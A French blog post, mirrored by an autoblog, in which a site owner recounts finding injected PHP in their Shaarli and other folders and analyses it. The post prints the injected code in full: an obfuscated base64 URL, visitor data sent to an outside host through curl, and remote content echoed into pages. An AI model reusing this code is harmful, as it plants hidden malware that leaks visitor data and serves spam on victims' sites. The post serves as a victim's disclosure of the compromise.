Autoblog de FullMaj

Ce site n'est pas le site officiel de FullMaj
C'est un blog automatisé qui réplique les articles de fullmaj.rd-h.fr/wordpress

Bordel de couille d’ours !

Thu, 23 Aug 2012 12:33:06 +0000 - (source)

Hier soir, j’essaie de me connecter sur mon shaarli. Et là surprise : Erreur php ligne 41.

WTF?

Alors je me logge sur mon ftp et je regarde mon dossier shaarli. Et que vois-je : le fichier index.php a été édité le matin.

Je l’ouvre et cherche cette ligne 41. J’y trouve un code dont je n’arrive pas à comprendre l’utilité, pour finalement voir en comparaison avec le code original, qu’un pargraphe a été ajouté dans le code de shaarli. Voici les lignes en question:

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

 La ligne intéressante dans ce bordel, c’est celle avec le base64_decode(), cela donne une URL vers un site à la con qui récupère un paquet d’infos  et doit surement en conséquence lancer une action à la mords-moi-le-noeud sur ma machine.

Petite inspection, tous mes autres dossiers ont été touchés, le wiki et mon projet perso Reflux inclus.

Y A UN FUCKING TYPE QUI A FUCKING SALOPE MON CHEZ MOI AVEC DU FUCKING SALE CODE ! FUCK !

Il semblerait que le mec se soit connecté en FTP, mais je ne trouve pas de trace dans les logs.

Bordel de couille d’ours ! Me suis fait avoir ! Damned que je n’aime pas ça.

J’ai nettoyé tous les fichiers touchés, et changé tous mes mots de passe. Ca fait bizarre, je ne sais pas si ca vient de mon hébergeur, de moi ou d’un autre PC infecté. Mais je me sens sale!

Edit : Il semblerait que ce soit un hack visant surtout le référencement de google, dont le but est de substituer un lien à un autre: http://www.peterrosenmai.com/a-hacking-visible-only-to-google

e-mail

Powered by VroumVroumBlog 0.1.32 - RSS Feed
Download config articles